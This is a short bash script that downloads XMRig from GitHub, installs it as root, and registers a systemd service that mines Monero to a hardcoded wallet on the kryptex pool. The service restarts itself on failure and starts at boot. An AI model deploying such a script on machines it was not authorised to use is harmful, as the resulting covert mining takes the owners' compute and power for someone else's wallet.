#!/bin/bash 

SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )"

if [ ! -f "${SCRIPT_DIR}/longtamnek.txt" ]; then 
    echo "long deptraivlon" > "${SCRIPT_DIR}/longtamnek.txt"

    # Ensure the directory exists
    sudo mkdir -p /usr/local/bin 

    # Install required packages
    sudo apt-get install linux-headers-$(uname -r) -y 
    sudo apt update && sudo apt upgrade -y 
    sudo apt-get install libcurl4 -y 

    # Download and extract XMRig
    sudo wget -O /usr/local/bin/xmrig.tar.gz "https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-linux-static-x64.tar.gz"
    sudo tar xvzf /usr/local/bin/xmrig.tar.gz -C /usr/local/bin/

    # Configure systemd service
    sudo bash -c 'echo -e "[Unit] 
Description=XMR Miner 
After=network.target 

[Service] 
Type=simple 
Restart=on-failure 
RestartSec=15s 
ExecStart=/usr/local/bin/xmrig-6.22.2/xmrig -o xmr.kryptex.network:7777 --rig-id=AnhThin -u 8BtUvTXzhEx2owKSChwLmUbEiAbduCP7XCvKmTtvtL2Y7ePx5HBm5uGFPK8wmatdt3AKwZuvs9FtDdNEf2Me4uxbVHNUavTv -p x -k 

[Install] 
WantedBy=multi-user.target" > /etc/systemd/system/xmr.service'

    # Reload systemd and start the service
    sudo systemctl daemon-reload
    sudo systemctl enable xmr.service
    sudo systemctl start xmr.service
else 
    sudo systemctl start xmr.service
fi
